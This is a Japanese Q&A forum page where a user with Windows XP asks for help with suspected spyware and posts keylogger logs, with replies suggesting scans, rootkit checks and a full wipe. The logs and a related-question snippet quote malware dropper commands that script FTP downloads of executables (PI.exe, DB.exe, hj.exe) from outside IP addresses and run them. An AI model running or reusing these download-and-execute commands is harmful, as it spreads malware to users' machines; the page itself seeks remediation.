スパイウェアとは?PCに不正なコマンドが残る理由と対処法

前へ 次へ
このQ&Aのポイント
  • PCを起動していると不明なコマンドプロンプトが立ち上がり、ファイル名を指定して実行されるなどの不審な動きがあります。spybotやadawareを使ったスキャンやOSの再インストールを試みましたが、状況は変わりません。データ復旧用HDDにもウィルスやスパイウェアが残っている可能性があり、対処法を知りたいです。
  • この問題はWindows XP SP2で発生しており、ノートンインターネットセキュリティ2008を使用しています。キーロガーによる履歴の一例を提供しました。対処法を教えていただけると助かります。
  • スパイウェアに感染している可能性があります。不正なコマンドプロンプトの起動やファイルの実行はスパイウェアによるものかもしれません。spybotやadawareを使用してスキャンしましたが、解決しませんでした。データ復旧用のHDDにも感染があるかもしれません。対処法をご教授ください。
回答を見る
  • ベストアンサー

スパイウェア?

PCを起動していると当然PCが動き出してコマンドプロンプトを立ち上げたり、ファイル名を指定して実行するなどに不明なコマンドが残っています。 おかしいと思ってから、spybotやadawareなどをインストールしてスキャンしてみましたが、状況は変わらず、最終手段としてOSを再インストールしてみたのですが、状況は変わりませんでした。 データ復旧用のHDDにウィルス・スパイウェアのようなものが残っているのでしょうか? どうすればよいか分かりません。 どなたか対応策がわかればご教授下さい。 以下にキーロガーにて残っていた履歴を載せます。 宜しくお願いします。 環境 OS:winXPsp2 対ウィルスソフト:ノートンインターネットセキュリティ2008 ログ [ActiveWindow => V^XN] 0:59:30 [RETURN] 0:59:32 [SHIFT] 0:59:32 [53] 0:59:32 s 0:59:32 y 0:59:32 s 0:59:33 t 0:59:33 e 0:59:33 m 0:59:33 r 0:59:33 o 0:59:33 o 0:59:33 t 0:59:33 [SHIFT] 0:59:33 [53] 0:59:34 [53] 0:59:34 s 0:59:34 y 0:59:34 s 0:59:34 t 0:59:34 e 0:59:34 m 0:59:34 [51] 0:59:35 [50] 0:59:35 [50] 0:59:35 c 0:59:35 m 0:59:35 d 0:59:35 d 0:59:35 e 0:59:35 x 0:59:36 e [ActiveWindow => Windows ^XN }l[W] 0:59:36 [RETURN] 1:5:37 f 1:5:37 f [ActiveWindow => V^XN] 1:5:38 [RETURN] /*--------------ClipBoard Start-----------------*/ cmd /c echo open 220.130.37.43 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get PI.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &PI.exe &exit /*--------------ClipBoard Exit-----------------*/ 1:5:45 v 1:5:45 [Ctrl] [ActiveWindow => Windows ^XN }l[W] 1:5:47 [RETURN] 1:6:30 f 1:6:30 f [ActiveWindow => V^XN] 1:6:31 [RETURN] /*--------------ClipBoard Start-----------------*/ cmd /c echo open 220.130.37.43 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &DB.exe &exit /*--------------ClipBoard Exit-----------------*/

質問者が選んだベストアンサー

  • ベストアンサー
  • FMVNB50GJ
  • ベストアンサー率27% (411/1520)
回答No.2

http://okwave.jp/qa3528224.html そこで書き込みした者です。 リカバリしたのに再びなってしまうというのは、以前のデータを全部消去していないからではないかと思いますが。 というのは、そのパソコンは最初からそういう状態ではないと思うので。 パソコンがネット接続されているときにだけ症状が出るのか、 パソコンをネットから物理的に切断している状態では出ないのか、 ですが。 直感的な判断は侵入されているということなんですが、プログラムを疑っているなら、その症状が出ているときにどんなプログラムが起動しているのか調べてはどうですか。キーロガーのログを見せられても当方よくわかりません。 侵入されているなら、探し出すのはできないと思います。ルートキットなどで隠すらしいですから。手馴れた侵入者は独自にカスタマイズしたルートキットを使っているらしいですし、専門家でなければ対応するのは無理だと思います。ただ、プログラムのせいでそうなるというなら、 ハードディスクのデータを一応DVDなどに保存、ハードディスクの全データ削除、BIOSの初期化、ルーターの初期化、リカバリ、だと思います。 「データ復旧用のHDD」 OSの再インストールといっているのは、丸ごとバックアップしたものを使うやつですか。時間的にリカバリよりもずっと早く終わるとか。 一応ルートキットスキャナーとして http://vil.nai.com/vil/stinger/rkstinger.aspx http://www.resplendence.com/hookanalyzer 全体を購入したときとほぼ同じ状態にできれば、その症状はなくなるはず。それでも同じ症状になることは、きちんとリカバリしていないことです。 パソコンは複数ですか。

その他の回答 (1)

  • borujoa
  • ベストアンサー率46% (82/176)
回答No.1

ノートンでもスキャンしてみたんですよね? 1、ちなみにSpybot、Ad-awareでのチェックは 通常ログイン時の検査と同時に セーフモードでスキャンしましたか? 2、意図しないコマンド実行などは ネットに接続していないときでも起こりますか? 3、セット接続しているとき、どこにアクセスしているか また、何処からアクセスされているかなどは調べましたか? 4、ルータは使用していますか? 5、そのPCは自宅で使用しているものか もしくは会社などで使用しているのか? LAN接続で別のPCと接続している環境なのか? 少なくてもこれくらいのチェックをした結果を 書いてほしいです。

5_5_johnny
質問者

補足

早速のご回答ありがとうございます。 説明不足の部分があって申し訳ありませんでした。 状況を説明しますと 1.セーフモードスキャンもしております。 2.ネット接続していないときも起きます。 3.力不足で調べ方がよくわかりません。  Norton等でアクセスログ等の確認はできるのですが  どの部分が通常と異なるのかがわからないのです。 4.ルータは使用しています。 5.自宅用です。  LAN等で別PCに接続しているわけではありません。 他にもお伝えするものがあれば仰ってください。 宜しくお願いします。

  1. カテゴリ
  2. インターネット・Webサービス
  3. セキュリティ対策・ネットトラブル
  4. スパイウェア

関連するQ&A

  • Mac OS X Serverのウィルスの質問です。

    macのウィルスについての質問です。 定期的に下記のようなのが自動的に打たれます。これはテキストに書かれたものです。 環境はMac OS X Server Ver 10.5.8 プロセッサ 1.83GHz Intel Core 2Duoです。 5systemroot5\system32\cmd.exe cmd /c echo open 143.90.172.46 57864 .. ik 7echo user t g .. ik 7echo get hj.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7hj.exe 7exit この中で、143.90.172.46 57864の最後の5桁の数字はいろいろ変わります。 これをどうにか排除する方法を教えてください。 よろしくお願いします。

  • ブラウン運動

    ブラウン運動で分からないところがあります。 (1)s<t E[ B(s)B(t) ] = E[ B(s)^2 ] + E[ B(s) { B(t)-B(s) } ] = s + 0 = s (2)s<t E[ B(t)^2 | F(s) ] = E[ { B(s) + { B(t)-B(s) } }^2 | F(s) ] = E[ B(s)^2 + 2B(s) { B(t)-B(s) } + { B(t)-B(s) }^2 | F(s) ] = E[ B(s)^2 | F(s) ] + 2B(s) E[ B(t)-B(s) | F(s) ] + E[ { B(t)-B(s) }^2 | F(s) ] = B(s)^2 + 0 + (t-s) となります。ただ、自分が分からないところは、(1)では、E[ B(s)^2 ] = sとなってますが、なぜ(2)では E[ B(s)^2 | F(s) ] = B(s)^2になるのかが分かりません。前者の考え方はわかりますが、後者のほうが納得できません。お分かりの方がいましたらご教授ください。 もう1つ、 T(a) = min{ t≧0 : B(t)=a }, T(a,N) = min{ t : B(t)∈/(a,N) }のとき、どうしてT(a)≧T(a,N)になるのでしょうか?

  • 金融工学

    こんばんは。金融工学について、2点ほど不明な点があり、質問させて頂きたいと思います。 1つ目は、友人が昔金融工学を学んだ際のノートに、 Xn→X(lin L^2)【ただしn→∞】⇒E(Xn)→E(X)(lin R)【ただしn→∞】 を示せ。 といった問題があったのですが、一体どうすれば良いのか分かりません。 友人も、大分昔のことなのであまり覚えてないとのことで・・・。 できれば解説をお願いします。 2つ目は、参考にしている図書に、伊藤積分過程の証明で E[|F(t)|] = 0 の説明のため以下のような記述がありました。 E[|F(t)|] = E[|∫_0^t f(s)dB(s)|] ≦ E[∫_0^t |f(s)dB(s)|] = 0 dB(s)が負の場合が存在すると思うのですが、その場合成立しないように思います。 実際はどうなのでしょうか? どちらか一つだけでも分かる方がいらっしゃいましたら、 どうかご教授のほどお願い致します。

  • 波動方程式について

    wikibookの http://ja.wikibooks.org/wiki/%E6%8C%AF%E5%8B%95%E3%81%A8%E6%B3%A2%E5%8B%95_%E6%B3%A2%E5%8B%95%E6%96%B9%E7%A8%8B%E5%BC%8F%E3%81%AE%E6%80%A7%E8%B3%AA のページにあるu(x,t)=f(x+vt)+g(x-vt)を f(x+vt)=1/2(u(x,t)-v*∫(∂u(x,t)/∂x)dt) に変換する過程の式を教えてください.この式はwikibookには書いていませんが分かる方お願いします. また,もう一つお聞きたいのですが (1/v^2)*(∂^2u(x,t)/∂t^2) を積分すると単純に (1/v^2)*(∂u(x,t)/∂t) となりますか?なるとうれしいのですが. 式が見難いとは思いますが上記ふたつについて回答お願いします.

  • [情報セキュリティ]以下のシェアから秘密sを求めよ

    問題. (2,3)-しきい値法において、ラグランジュの補間公式を用いて、以下のシェアから秘密sを求めよ t1=f(1)=2 t3=f(3)=4 解答. i1 = 1, i2 = 3とする λ1(0) = -i2/(i1 - i2) = -3/(1-3) = 3/2 λ2(0) = -i1/(i2 - i1) = -1/(3-1) = -1/2 s = f(0) =λ1(0) f(i1) + λ2(0) f(i2) =(3/2)・2+(-1/2)・4 =1 ー--講義資料ー-- (2,3)-しきい値法の例. 秘密s=1, a1=1とする f(x)=1+xとなる よってf(0)=s シェア t1=f(1)=2 t2=f(2)=3 t3=f(3)=4 ラグランジュの補間公式. {f(i1), ・・・,f(ik)}からf(x)を補間する公式 f(x)=λ1 f(i1)+λk f(ik) mod p s=f(0)=λ1(0) f(i1)+・・・+λk(0) f(ik) mod p ー--- 全くわかりません

  • sedの引数を変数に格納する方法

    例えば、次のコマンド echo a b c d e f | sed -e 's/.*\(b.*e\).*/\1/' -e 's/.*b c *\(.*\) .*/\1/' の「-e 's/.*\(b.*e\).*/\1/' -e 's/.*b c *\(.*\) .*/\1/'」の部分を変数に格納して echo a b c d e f | sed $regex のように実行したいのですが、変数が展開されるときにクォーテーションマークがどのように付与されるのかを理解できず、 regex=’-e s/.*\(b.*e\).*/\1/' まではできたのですが、コマンドにスペースが入った場合、どうすれば良いのかわからないため、後半のコマンドを格納することができません。 この場合、どのように変数に格納すれば良いのでしょうか。 よろしくお願いいたします。

  • JavaScriptの配列について

    var old_array = Array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '<', '#', '/', '>', '%', '.', '*', '0', '!', '?', ':', '=', '|'); var new_array = Array('b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '<', '#', '/', '>', '%', '.', '*', '0', '!', '?', ':', '=', '|'); のような配列があり、 abcと入力するとbcd DEFと入力するとEFG 012と入力すると!23 というようなものを作りたいのですがどうすればいいでしょうか。

  • 電気回路 過渡現象

    以下の回路図において,時刻t=0においてスイッチSを閉じ、さらに時間が十分経過した後、(t=T)で、スイッチSを開いた。v(0)=Eとする。 (1)時刻t=0においてスイッチSを閉じる直前の電流iはいくらか。 i=0 (2)時刻t=TにおいてスイッチSを開く直前の電圧Vはいくらか。 分圧より,V=R2/(R1+R2)*E (3)スイッチSが閉じている時(0<t<T)の、電圧v(t)に関する回路の方程式(v(t)のみの微分方程式)を求めなさい。 回路より, E = R1i+v (a) コンデンサCに流れる電流をIc、抵抗R2に流れる電流をIr2とすると、 i=Ic+Ir2 (b) Ir2=V/R2 (c)、Ic=dq/dt=C*dv/dt (d) (c)、(d)式を(b)式に代入すると i=C*dv/dt+V/R2 (e) (e)式を(a)式に代入すると、E=R1(C*dv/dt+V/R2)+v → E= CR1*dv/dt+(1+R1/R2)V よって E=CR1*dv/dt+(R1+R2)/R2*V (f) (f)式が問(3)の解答かなと思います。 (4)スイッチSが閉じている時(0<t<T)の電圧v(t)を求めなさい。 上式(f)の微分方程式を解くと v(t)=R2E/(R1+R2){1-e^(-(R1+R2)t/(CR1R2))}+Ee^(-(R1+R2)t/(CR1R2))となりました。 解答がないため答えの確認ができません。自分なりの解答を載せていますがあっているかがわかりません。どなたかみていただけませんか?

  • JScriptの問題です。添削お願いします。【至急!】

    f(x)=cos(x)-x^2=0の解を割線法により求めよ、という問題です。 初期値はx1=1,x2=0.5です。 以下は自分で解答を作りました。 自分で怪しいと思うところはわかるのですが、それをどう正せばいいかわかりません。 添削お願い致します。 割線法の公式は、 X_(n+1)=X_n-{(X_n-X_(n-1))/(f(X_n)-f(X_(n-1))}*f(X_n) として考えました。 var e=0.001 , x1=1.0 , x2=0.5 , N=27; function f(x){return Math.cos(x)-x*x;} WScript.Echo("割線法:\n"+SplitLine(N,e,x1,x2)); function SplitLine(N,e,x1,x2){ var x=x1,x2,xn,str=""; for(var i=1; i<N; i++){ str+=(i+1)+" "+x+"\n"; xn=x-((x-(x-1))/(f(x)-f(x-1)))*f(x); //←ここが違うのでしょうか? if(Math.abs((xn-x)/x)<e) break; x=xn; } return str; }

  • 逆ラプラス変換について

    L^(-1)[log((s+a)/(s+b))](x) という問題をとくのに授業でもらったプリントに F(s)=log((s+a)/(s+b))=log(s+a)-log(s+b) とおく s→∞でlimF(s)=0 でありF'(s)=1/(s+a)-1/(s+b) であるのでF(s)=-∫F'(t)dt (s~∞)=∫{1/(t+a)-1/(t+b)}dt (s~∞) である.ここでG(s)=1/(s+a)-1/(s+b) と置くと F(S)=∫G(t)dt(s~∞) でありg(x)=L^(-1)G(x)=e^(-bx)-e^(-ax) よってL^(-1)F(x)=L^(-1)[∫G(t)dt](x) (s~∞) =g(x)/x==e^(-bx)-e^(-ax)/xと書いてありましたが 途中のF(s)=-∫F'(t)dt (s~∞)がこうなるのがよくわかりません.公式ですか? ただL^(-1)(s/(s^2+4)^2)(x) を上記の通りに解いたら2(e^(x)-cosx)/xとなりました.これは合っているのでしょうか?

注目のQ&A

カテゴリ

専門家に質問してみよう

職業から探して質問する

あなたにピッタリな商品が見つかる! OKWAVEセレクト

質問する